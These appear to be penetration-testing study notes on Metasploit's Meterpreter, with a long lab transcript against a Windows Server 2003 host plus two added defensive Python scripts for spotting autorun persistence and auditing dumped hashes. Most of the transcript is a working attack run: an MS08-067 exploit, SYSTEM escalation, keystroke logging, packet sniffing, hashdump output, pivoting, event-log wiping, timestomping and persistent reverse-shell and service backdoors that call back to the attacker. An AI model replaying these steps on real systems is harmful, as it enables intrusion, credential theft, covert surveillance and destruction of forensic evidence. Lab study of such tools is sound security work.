IX. The powerful Meterpreter

1. Revisiting Metasploit's payload modules

(1) Typical payload modules

Metasploit covers all the major operating systems and platforms. The great majority of its payload modules are used by remote exploits; their usual job is to open a remote shell or execute commands remotely.

Metasploit also lets you import your own shellcode into the framework: replace the payload body with your shellcode and update the description and other basic module information.

(2) Using payload modules

  • search: find and query modules
  • info: show a module's details
  • msfpayload: inspect and manage payloads/shellcode (removed from current Metasploit releases; msfvenom replaces it)

(3) Technical advantages of Meterpreter

  • Platform independence
  • Runs purely in memory
  • Flexible, encrypted communication protocol
  • Easy to extend

2. Meterpreter commands in detail

(1) Basic commands

1. background: hide the Meterpreter session in the background
2. sessions: list the sessions obtained so far; to interact with one of them again, use sessions -i <id>
3. quit: close the current session
4. shell: get a console shell on the target system
5. irb: interact with Ruby from inside Meterpreter

(2) File system commands

1. cat: view a file's contents
2. getwd: get the current working directory on the target
3. upload: upload a file
4. download: download a file
5. edit: open a file in the vi editor
6. search: search for files

(3) Network commands

1. ipconfig: show network interface information
2. portfwd: port forwarding
3. route: show routing information

(4) System commands

1. ps: get information about running processes
2. migrate: move the Meterpreter session from one process into another
3. execute: run a file on the target
4. getpid: get the PID of the process the current session lives in
5. kill: terminate a process (and with it the session it hosts)
6. getuid: get the user name the Meterpreter session runs as
7. sysinfo: get information about the target system
8. shutdown: shut the target down

3. Post-exploitation modules

Post modules are used much like exploit modules; you only need to specify the session to run them against.

4. Using Meterpreter in penetration testing

(1) The persistence post module

Installs an autostart entry on the target host so that control survives reboots.

(2) The metsvc post module

Installs Meterpreter on the target host as a system service.

(3) The getgui post module

Enables Remote Desktop.
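Seen from the defender's side, persistence and getgui leave host artifacts that a triage script can look for: an autorun value that launches a script from a scratch directory, and a Winlogon UserList entry set to 0 that hides the created account from the logon screen. The following is an added example, not code from these notes or from Metasploit; it runs over a constructed sample in `reg query` layout (the value names mirror the hands-on output below), and `SAMPLE_REG`, `parse_reg_query` and `triage_autoruns` are names chosen here.

```python
import re

# Constructed sample in the layout of `reg query` output (not captured from
# the notes' target host); the value names and paths mirror what the
# persistence and getgui scripts report in the hands-on section.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    cvuNVUtJDqqUNBs    REG_SZ    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DQehvG.vbs

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    metasploit    REG_DWORD    0x0
"""

# Autorun targets that live in user-writable scratch directories, or that are
# scripts rather than installed binaries, are what the persistence script
# leaves behind and are rare for legitimate software.
SCRATCH_DIR = re.compile(r"\\(temp|tmp|local settings|appdata|users\\public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|js|wsf|hta|bat|cmd|ps1)(\s|\"|$)", re.I)

def parse_reg_query(text):
    """Yield (key, value_name, value_type, data) from `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = re.match(r"^\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*)$", line)
        if m and key:
            yield key, m.group(1), m.group(2), m.group(3).strip()

def triage_autoruns(reg_text):
    """Return (category, value_name, data) for entries worth a closer look."""
    findings = []
    for key, name, _vtype, data in parse_reg_query(reg_text):
        k = key.lower()
        if k.endswith(r"\currentversion\run"):
            if SCRATCH_DIR.search(data) or SCRIPT_EXT.search(data):
                findings.append(("autorun", name, data))
        elif k.endswith(r"\specialaccounts\userlist"):
            # A DWORD of 0 here hides the account from the logon screen,
            # which is exactly what getgui does with the user it creates.
            if data in ("0x0", "0"):
                findings.append(("hidden-account", name, data))
    return findings

if __name__ == "__main__":
    for category, name, data in triage_autoruns(SAMPLE_REG):
        print(f"{category:15} {name:20} {data}")
```

The metsvc variant shows up instead as a service named metsvc whose binaries sit in the Temp directory printed by the script; `sc qc metsvc` output can be checked the same way.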

(4) Privilege escalation

  • getsystem: integrates four escalation techniques; -h lists them
  • Exploiting the MS10-073 and MS10-092 vulnerabilities
  • The service_permissions module

(5) Information theft

  • dumplinks: obtains the target host's recent system activity and the records of which files and documents were opened
  • enum_applications: obtains the software installed on the target host, including security updates and patches
  • keyscan: keystroke logging of user input

(6) Password capture and use

  • Network sniffing: the sniffer module
  • Capture via the browser: the enum_ie module reads passwords cached by Internet Explorer
  • System password capture: hashdump reads the system's password hashes directly; smart_hashdump is the post-module equivalent. Using the hashes: either crack them with a password-cracking tool or replay them directly with psexec (a pass-the-hash attack using the system's password hashes)
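For the hashdump and smart_hashdump output in the hands-on section, the question an administrator has to answer is which accounts need a reset. The following is an added example, not part of these notes or of Metasploit: it parses the pwdump-format lines (user:RID:LM:NT:::) and reports accounts that still store an LM hash (the NoLMHash policy is not set) and accounts that share an NT hash (the same password on several accounts). The input is the four lines shown on the page plus one constructed "backup" account; `SAMPLE_DUMP`, `parse_hashdump` and `audit` are names chosen here.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# The four accounts listed by smart_hashdump in the hands-on section, plus one
# constructed account ("backup") that reuses the Administrator password.
SAMPLE_DUMP = """\
[+] Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
[+] IUSR_ROOT-TVI862UBEH:1004:7d730a3707abd506a84a60b453cab938:42fc0d1aaf3eeda15e9c5e64322a29e1:::
[+] IWAM_ROOT-TVI862UBEH:1006:72f7503120401ee0845a72ccde743c03:cb7625dafeb8908bb37b5730d7d36867:::
[+] ASPNET:1008:b4df3d6cb6929cc09cb07285b13aca78:9c8be841d72dbd132d22477ff8b7e9d3:::
[+] backup:1010:aad3b435b51404eeaad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
"""

def parse_hashdump(text):
    """Return [(user, rid, lm, nt)] from pwdump-style lines, skipping status lines."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[+]"):
            line = line[3:].strip()          # smart_hashdump prefixes each record
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                         # progress output, loot paths, blanks
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        rows.append((parts[0], int(parts[1]), lm, nt))
    return rows

def audit(rows):
    """Return (accounts, finding) pairs a defender should act on."""
    findings = []
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in rows:
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored: enable NoLMHash and reset the password"))
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((", ".join(users), "same NT hash: password shared between accounts"))
    return findings

if __name__ == "__main__":
    for who, what in audit(parse_hashdump(SAMPLE_DUMP)):
        print(f"{who}: {what}")
```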

(7) Pivoting into the internal network

  • Add a route with the route command
  • Port scanning
  • Attacks using the captured password hashes
  • Combining the MS08-068 and MS10-046 vulnerabilities
  • Setting up an SMB server: the smb_relay module
  • Analysing the results

(8) Covering tracks

  • clearev: clears the event logs
  • timestomp: modifies a file's creation and last-access times

Practice

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.210
LHOST => 192.168.1.210
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.130
RHOST => 192.168.1.130
msf exploit(windows/smb/ms08_067_netapi) > set target 3
target => 3
msf exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.1.130:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.1.130:4444
[*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.210:40519 -> 192.168.1.130:4444) at 2018-10-13 13:24:25 +0800

meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1796 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>exit
exit
meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"Computer"=>"ROOT-TVI862UBEH", "OS"=>"Windows .NET Server (Build 3790).", "Architecture"=>"x86", "BuildTuple"=>nil, "System Language"=>"en_US", "Domain"=>"WORKGROUP", "Logged On Users"=>2}
>> client.railgun.shell32.IsUserAnAdmin
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
>> client.railgun.kernel32.SetThreadExecutionState("ES_CONTINUOUS|ES_SYSTEM_REQUIRED")
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>2147483648}
>> exit
meterpreter > cat c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Windows Server 2003, Enterprise" /fastdetect
meterpreter > getwd
C:\WINDOWS\system32
meterpreter > getlwd
/root
meterpreter > upload -h
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

-h Help banner
-r Upload recursively

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > upload poc.py
[*] uploading : poc.py -> poc.py
[*] Uploaded 733.00 B of 733.00 B (100.0%): poc.py -> poc.py
[*] uploaded : poc.py -> poc.py
meterpreter > download poc.py
[*] Downloading: poc.py -> poc.py
[*] Downloaded 733.00 B of 733.00 B (100.0%): poc.py -> poc.py
[*] download : poc.py -> poc.py
meterpreter > edit c:\windows\system32\drivers\etc\hosts
meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner
-r <opt> Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\windows -f *.mdb
Found 2 results...
c:\windows\system32\ias\dnary.mdb (294912 bytes)
c:\windows\system32\ias\ias.mdb (249856 bytes)
meterpreter > ipconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:89:0b:d0
MTU : 1500
IPv4 Address : 192.168.1.130
IPv4 Netmask : 255.255.255.0

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 1234 -p 6001 -r 192.168.1.130
[*] Local TCP relay created: :1234 <-> 192.168.1.130:6001
meterpreter > route

IPv4 network routes
===================

Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.1.1 10 65539
127.0.0.0 255.0.0.0 127.0.0.1 1 1
192.168.1.0 255.255.255.0 192.168.1.130 10 65539
192.168.1.130 255.255.255.255 127.0.0.1 10 1
192.168.1.255 255.255.255.255 192.168.1.130 10 65539
224.0.0.0 240.0.0.0 192.168.1.130 10 65539
255.255.255.255 255.255.255.255 192.168.1.130 1 65539

No IPv6 routes were found.
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
...
304 1980 VMwareUser.exe x86 0 ROOT-TVI862UBEH\Administrator C:\Program Files\VMware\VMware Tools\VMwareUser.exe
...
meterpreter > migrate 304
...
[*] Migrating from 1028 to 304...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.1.130:6001
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The dummy executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
meterpreter > execute -H -f cmd.exe
Process 4948 created.
meterpreter > execute -H -i -f cmd.exe
Process 5228 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>exit
exit
meterpreter > execute -H -m -d calc.exe -f wec.exe -a "-o foo.txt"
meterpreter > getpid
Current pid: 304
meterpreter > kill 1840
meterpreter > getuid
Server username: ROOT-TVI862UBEH\Administrator
meterpreter > sysinfo
Computer : ROOT-TVI862UBEH
OS : Windows .NET Server (Build 3790).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/forensics/enum_drives
msf post(windows/gather/forensics/enum_drives) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows ROOT-TVI862UBEH\Administrator @ ROOT-TVI862UBEH 192.168.1.210:40519 -> 192.168.1.130:4444 (192.168.1.130)

msf post(windows/gather/forensics/enum_drives) > set session 1
session => 1
msf post(windows/gather/forensics/enum_drives) > exploit

Device Name: Type: Size (bytes):
------------ ----- -------------
<Physical Drives:>
\\.\PhysicalDrive0 4702111234474983745
<Logical Drives:>
\\.\A: 4702111234474983745
\\.\C: 4702111234474983745
\\.\D: 4702111234474983745
[*] Post module execution completed
msf post(windows/gather/forensics/enum_drives) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/checkvm

[*] Checking if ROOT-TVI862UBEH is a Virtual Machine .....
[+] This is a VMware Virtual Machine
meterpreter > run persistence -X -i 5 -p 443 -r 192.168.1.210

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-TVI862UBEH_20181013.5800/ROOT-TVI862UBEH_20181013.5800.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=443
[*] Persistent agent script is 99610 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DQehvG.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DQehvG.vbs
[+] Agent executed with PID 4976
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cvuNVUtJDqqUNBs
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cvuNVUtJDqqUNBs
meterpreter > run metsvc

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfmBMnhj...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
# Removing the service afterwards: sc delete "metsvc"

meterpreter > run getgui -u metasploit -p meterpreter

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Setting user account for logon
[*] Adding User: metasploit with Password: meterpreter
[*] Hiding user from Windows Login screen
[*] Adding User: metasploit to local group Remote Desktop Users
[*] Adding User: metasploit to local group Administrators
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20181013.5921.rc
meterpreter > run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20181013.5921.rc
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
Process 6592 created.
[*] Running command reg deleteval -k HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -v metasploit
Successfully deleted metasploit.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/dumplinks

[*] Running module against ROOT-TVI862UBEH
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent...
...
meterpreter > run post/windows/gather/enum_applications
...
Windows Installer 3.1 (KB893803) 3.1

[+] Results stored in: /root/.msf4/loot/20181013140645_default_192.168.1.130_host.application_531976.txt
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
<CR>
<CR>
hello world<Right Shift>!!!<^S>

meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces

1 - Intel(R) PRO/1000 MT Network Connection ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/win2k3.cap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 163 packets (47049 bytes)
[*] Downloaded 100% (47049/47049)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/win2k3.cap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 106 packets (27046 bytes) remaining
[*] Download or release them using sniffer_dump or sniffer_release
meterpreter > run post/windows/gather/enum_ie

[*] IE Version: 6.0.3790.0
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
File: C:\Documents and Settings\Administrator\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
[*] Writing history to loot...
[+] Data saved in: /root/.msf4/loot/20181013141020_default_192.168.1.130_ie.history_933570.txt
meterpreter > hashdump
Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
...
meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against ROOT-TVI862UBEH
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20181013141207_default_192.168.1.130_windows.hashes_669593.txt
...
[+] Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
[+] IUSR_ROOT-TVI862UBEH:1004:7d730a3707abd506a84a60b453cab938:42fc0d1aaf3eeda15e9c5e64322a29e1:::
[+] IWAM_ROOT-TVI862UBEH:1006:72f7503120401ee0845a72ccde743c03:cb7625dafeb8908bb37b5730d7d36867:::
[+] ASPNET:1008:b4df3d6cb6929cc09cb07285b13aca78:9c8be841d72dbd132d22477ff8b7e9d3:::
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf post(windows/gather/forensics/enum_drives) > route add 10.10.10.0 255.255.255.0 1
[*] Route added
msf post(windows/gather/forensics/enum_drives) > route print

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
10.10.10.0 255.255.255.0 Session 1

[*] There are currently no IPv6 routes defined.

msf post(windows/gather/forensics/enum_drives) > route del 10.10.10.0 255.255.255.0 1
[*] Route removed
msf post(windows/gather/forensics/enum_drives) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > clearev
[*] Wiping 930 records from Application...
[*] Wiping 1329 records from System...
[*] Wiping 1218 records from Security...
meterpreter > timestomp poc.py -f
[*] Pulling MACE attributes from
[-] priv_fs_get_file_mace: Operation failed: The handle is invalid.
meterpreter > upload jnx.txt
[*] uploading : jnx.txt -> jnx.txt
[*] Uploaded 530.00 B of 530.00 B (100.0%): jnx.txt -> jnx.txt
[*] uploaded : jnx.txt -> jnx.txt
meterpreter > timestomp poc.py -f jnx.txt
[*] Pulling MACE attributes from jnx.txt
[*] Setting specific MACE attributes on poc.py
[-] priv_fs_set_file_mace: Operation failed: The handle is invalid.
meterpreter > upload poc.py
[*] uploading : poc.py -> poc.py
[*] Uploaded 733.00 B of 733.00 B (100.0%): poc.py -> poc.py
[*] uploaded : poc.py -> poc.py
meterpreter > timestomp poc.py -f jnx.txt
[*] Pulling MACE attributes from jnx.txt
[*] Setting specific MACE attributes on poc.py

Leaving a backdoor:

1. Metsvc (installed as a service)

meterpreter > run metsvc

Now we connect to it:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/metsvc_
set payload windows/metsvc_bind_tcp set payload windows/metsvc_reverse_tcp
msf exploit(multi/handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(multi/handler) > set RHOST 192.168.1.130
RHOST => 192.168.1.130
msf exploit(multi/handler) > set LPORT 31337
LPORT => 31337
msf exploit(multi/handler) > exploit
...
# Personally I find this less handy than persistence, and it leaves traces more easily.

2. persistence (the target connects back automatically when it boots)

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.1.210

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-TVI862UBEH_20181013.2609/ROOT-TVI862UBEH_20181013.2609.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=443
[*] Persistent agent script is 99672 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\TmwXVpORhOVej.vbs
[*] Executing script C:\WINDOWS\TEMP\TmwXVpORhOVej.vbs
[+] Agent executed with PID 4712
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ccjYaIV
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ccjYaIV

Then reboot the target and test:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.210
LHOST => 192.168.1.210
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.210:443
[*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.210:443 -> 192.168.1.130:1031) at 2018-10-13 15:30:20 +0800

meterpreter >

It connects back automatically.

